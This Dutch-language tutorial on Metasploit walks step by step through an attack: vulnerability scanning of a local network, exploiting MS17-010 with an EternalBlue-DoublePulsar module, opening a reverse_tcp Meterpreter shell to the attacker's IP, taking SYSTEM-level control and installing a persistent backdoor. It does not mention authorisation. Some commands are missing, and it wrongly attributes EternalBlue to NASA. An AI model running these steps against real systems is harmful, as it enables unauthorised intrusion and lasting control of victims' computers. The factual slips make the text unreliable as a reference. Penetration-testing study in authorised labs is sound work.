Zoals we de TOP 25 BESTE KALI LINUX TOOL hebben besproken, en we hebben METASPLOIT op de eerste plaats in de lijst gezet, laten we nu METASPLOIT bespreken en erover leren. Wij zouden u aanraden om vertrouwd te zijn met Metasploit.
Metasploit oorspronkelijk gemaakt door H. D Moore in 2003, totdat het werd overgenomen en verder ontwikkeld door Rapid7 op 21 oktober 2009. Het Metasploit-framework is volledig geschreven in Ruby, en is een standaard pakket dat geïnstalleerd is in Kali Linux (en ook bijna alle systemen voor penetratietesten, denk ik). Het is een favoriete kit van hackers of penetratietesters om beveiligingslekken te onderzoeken, exploits te ontwikkelen en uit te voeren op doelen, en andere beveiligingsontwikkeling.
Metasploit wordt geleverd met verschillende edities, over het algemeen verdeeld in twee categorieën, gratis versie en betaalde versie. De gratis versies: Metasploit Framework Community Edition (CLI gebaseerde interface) en Armitage (GUI gebaseerde interface). De betaalde versies : Metasploit Express, Metasploit Pro, en Cobalt Strike (het is vergelijkbaar met Armitage, die wordt geleverd door Strategic Cyber LLC).
Metasploit stelt gebruikers in staat om hun eigen exploit code te maken (of te ontwikkelen), maar maak je geen zorgen als je niet weet hoe je moet coderen, Metasploit heeft zoveel modules en ze worden voortdurend bijgewerkt. Momenteel heeft Metasploit meer dan 1600 exploits en 500 payloads. De eenvoudige manier om te begrijpen wat exploits en payloads zijn, een exploit is in feite hoe de aanvaller de payload levert, via het gat in de kwetsbaarheid van het doelsysteem. Zodra de aanvaller een exploit lanceert die een payload bevat tegen een kwetsbaar doelwit, dan wordt de payload ingezet (payload gebruikt om verbinding te maken met de aanvaller om op afstand toegang te krijgen tot het doelsysteem), in dit stadium is de exploit klaar, en wordt het irrelevant.
“Metasploit is geen hacking instant tool, het is een krankzinnig framework”
Dit Metasploit artikel gaat over het uitvoeren van penetratie testen tegen een doelsysteem met behulp van de volgende flow:
- Vulnerability Scanning
- Vulnerability Assessment
- Exploiting
- Gaining Remote Access – own the system
PREPARATION
Zorg ervoor dat onze Kali Linux de laatste bijgewerkte versie heeft. Er zullen verbeteringen zijn in elke update. Voer de volgende commando’s uit:
~# apt upgrade -y
~# apt dist-upgrade -y
Als onze machine eenmaal up-to-date is, laten we nu beginnen met het opstarten van de metasploit console. In de terminal, type:
En je hebt ook een tekst editor nodig, Gedit of Leafpad, om onderweg wat informatie te verzamelen voordat we de aanval gaan compileren. Allereerst moet je het IP-adres van de draadloze interface, het IP-adres van de router en het netmask.
Op basis van de bovenstaande informatie noteren we het IP-adres van WLAN1 en de router, en het netmask. De notitie zou er dus als volgt uit moeten zien:
Attacker IP (LHOST): 192.168.1.56
Gateway / Router’s IP: 192.168.1.1
Netmask: 255.255.255.0(/24)
STAP 1 : VULNERABILITY SCANNING
In de metasploit console, verzamelen we dan eerst informatie, zoals doel IP adres, Operating System, geopende poorten, en de kwetsbaarheid. Metasploit staat ons toe om NMap direct vanuit de console uit te voeren. Op basis van de bovenstaande informatie voeren we dit commando uit om onze informatie te verzamelen.
msf > nmap -v 192.168.1.1/24 --script vuln -Pn -O
Van het bovenstaande commando kregen we het onderstaande resultaat.
We hebben een kwetsbaar doelwit met Windows besturingssysteem, en het kwetsbare punt bevindt zich in de SMBv1-service. Dus, voeg toe aan notitie.
Target IP (RHOST): 192.168.1.57
Kwetsbaarheid: Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
STAP 2 : VULNERABILITY ASSESSMENT
Nu weten we het doelwit en de kwetsbaarheid. Laten we de kwetsbaarheid controleren in metasploit console
Nu kennen we het doelwit en de kwetsbaarheid. Laten we de kwetsbaarheid controleren in metasploit console met behulp van smb_scanner auxiliary module. Voer het volgende commando uit:
msf auxiliary(smb_ms17_010) > set RHOSTS
msf auxiliary(smb_ms17_010) > run
Metasploit is zeker van de kwetsbaarheid, en het laat de exacte Windows OS Editie zien. Toevoegen aan opmerking:
Doel OS: Windows 7 Ultimate 7600
STAP 3 : EXPLOITING
Ongelukkig genoeg heeft metasploit geen exploit module gerelateerd aan deze kwetsbaarheid. Maar, maak je geen zorgen, er is een kerel daarbuiten die de exploit code heeft geschreven. De exploit is bekend, omdat het is geïnitieerd door NASA heet het EternalBlue-DoublePulsar. Je kunt het hier downloaden, of je kunt de handleiding van onderstaande video volgen om de exploit code te installeren in je metasploit framework.
Als je eenmaal de bovenstaande handleiding hebt gevolgd, (zorg ervoor dat het pad hetzelfde is als in de handleiding). Nu ben je klaar om het doel te exploiteren. Voer de volgende opdrachten uit:
set payload windows/meterpreter/reverse_tcp
set PROCESSINJECT spoolsv.exe
set RHOST 192.168.1.57
set LHOST 192.168.1.56
Exploit
Boom… De exploit slaagde, we kregen meterpreter sessie. Zoals ik al eerder zei, zodra de exploit gelanceerd is, zal het de payload deployen, welke hier windows/meterpreter/reverse_tcp.
STAP 4 : GAINING REMOTE ACCESS
Laten we de meer beschikbare commando’s verkennen, voer ‘?’ in (zonder vraagteken) en zie de lijst met beschikbare commando’s. De Stdapi, systeem commando’s zijn:
Om meer informatie over het doelsysteem te zien, gebruik ‘sysinfo’ commando. De uitvoer zou er als volgt uit moeten zien.
Omdat we ons eerder in het systeemproces (spoolsv.exe) hebben ingespoten, hebben we Systeemprivilege gekregen. We bezitten het doelwit. We kunnen veel doen met het commando naar het doel. We kunnen bijvoorbeeld RDP draaien, of gewoon VNC remote zetten. Om de VNC service te draaien, voer je het volgende commando in:
Het resultaat zou het bureaublad van de doelmachine moeten zijn, het ziet er zo uit.
Het belangrijkste gedeelte is om een backdoor te maken, zodat wanneer het doel de verbinding met onze machine verbreekt, de doelmachine zal proberen om weer verbinding te maken, opnieuw met ons. Backdooring wordt gebruikt om toegang te behouden, het is net als vissen, je gooit je vis niet terug in het water als je de vis hebt, toch? Je wilt iets met de vis doen, of je bewaart hem in de koelkast voor verdere acties, zoals koken of je verkoopt hem voor geld.
Meterpreter heeft deze persistente backdooring functie. Voer het volgende commando uit, en kijk eens naar de beschikbare parameters en argumenten.
meterpreter > run persistence -h
Als je je niet op je gemak voelt met dit verouderde script, de nieuwste persistentie module staat onder post/windows/manage/persistence_exe. Je kunt het zelf verder onderzoeken.
Metasploit is enorm, het is niet alleen een tool, het is een framework, bedenk dat het meer dan 1600 exploits heeft en ongeveer 500 payloads. Een artikel is alleen geschikt voor het grote plaatje van het algemene gebruik of idee. Maar, je hebt zo veel geleerd van dit artikel.
“Hoe meer je de aanvalsstroom volgt, hoe meer je moeiteloze uitdaging hebt.”